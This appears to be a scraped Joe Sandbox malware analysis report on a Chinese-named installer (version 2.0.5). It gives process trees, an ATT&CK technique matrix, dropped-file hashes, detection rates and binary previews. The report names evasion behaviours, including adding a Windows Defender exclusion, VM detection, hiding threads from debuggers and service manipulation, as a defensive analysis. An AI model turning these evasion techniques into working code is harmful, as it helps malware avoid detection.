Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0082AB2A GetSystemTimeAsFileTime,11_2_0082AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008C0090 GetVersion,11_2_008C0090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory421
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579694 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 96 90 Multi AV Scanner detection for dropped file 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 3 other signatures 2->96 10 #U5b89#U88c5#U52a9#U624b_2.0.5.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 30 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.5.tmp 3 5 10->19         started        23 sc.exe 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 26 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b_2.0.5.exe 2 19->35         started        38 powershell.exe 23 19->38         started        51 2 other processes 23->51 41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        45 conhost.exe 29->45         started        47 conhost.exe 31->47         started        49 conhost.exe 33->49         started        53 25 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.5.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\trash (copy), PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\is-HSQ4G.tmp, PE32+ 55->82 dropped 84 3 other files (1 malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.5.exe8%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b_2.0.5.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc10%VirustotalBrowse
C:\Program Files (x86)\Windows NT\is-HSQ4G.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-HSQ4G.tmp0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vac11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.5.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F22B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.1424499799.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000000.1515986728.0000000000B2D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F22B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.1424499799.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000000.1515986728.0000000000B2D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579694
                    Start date and time:2024-12-23 07:51:47 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:108
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.5.exe
                    Detection:MAL
                    Classification:mal96.evad.winEXE@140/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 84
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 4.245.163.56
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                        Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                            Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                      C:\Program Files (x86)\Windows NT\hrsw.vbc#U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                        #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                          Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                            #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                              Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                                #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                                  #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                    #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                                      #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):831200
                                                        Entropy (8bit):6.671005303304742
                                                        Encrypted:false
                                                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):249984
                                                        Entropy (8bit):7.999231321310217
                                                        Encrypted:true
                                                        SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
                                                        MD5:11518A96514343C3195F339C0F0C514F
                                                        SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
                                                        SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
                                                        SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
                                                        Malicious:false
                                                        Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        • Antivirus: Virustotal, Detection: 10%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):249984
                                                        Entropy (8bit):7.999231321310217
                                                        Encrypted:true
                                                        SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
                                                        MD5:11518A96514343C3195F339C0F0C514F
                                                        SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
                                                        SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
                                                        SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
                                                        Malicious:false
                                                        Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.997020385738187
                                                        Encrypted:true
                                                        SSDEEP:1536:HH0XLz6hYcW9MqEMv94PUICwNW6apEIeq0/cR:HHvvW9NE54efcR
                                                        MD5:5AE192345F0F69A9B67788EB3F38FB9B
                                                        SHA1:C9ACF1FAC77D08FB8DF1443D067D171B089EF959
                                                        SHA-256:64FE275448F9A1FB87250C7D4AD637274C259F2958E3BB58D68E722DD91E9CC7
                                                        SHA-512:A5B9AA3870DCA279A055B2CDBDD903E3A0525D23E8CD01181686ECFBFE67F6A576B924CD582256C74F0BB22100A0D02F8270B9679728C65E023E0E342AA89998
                                                        Malicious:false
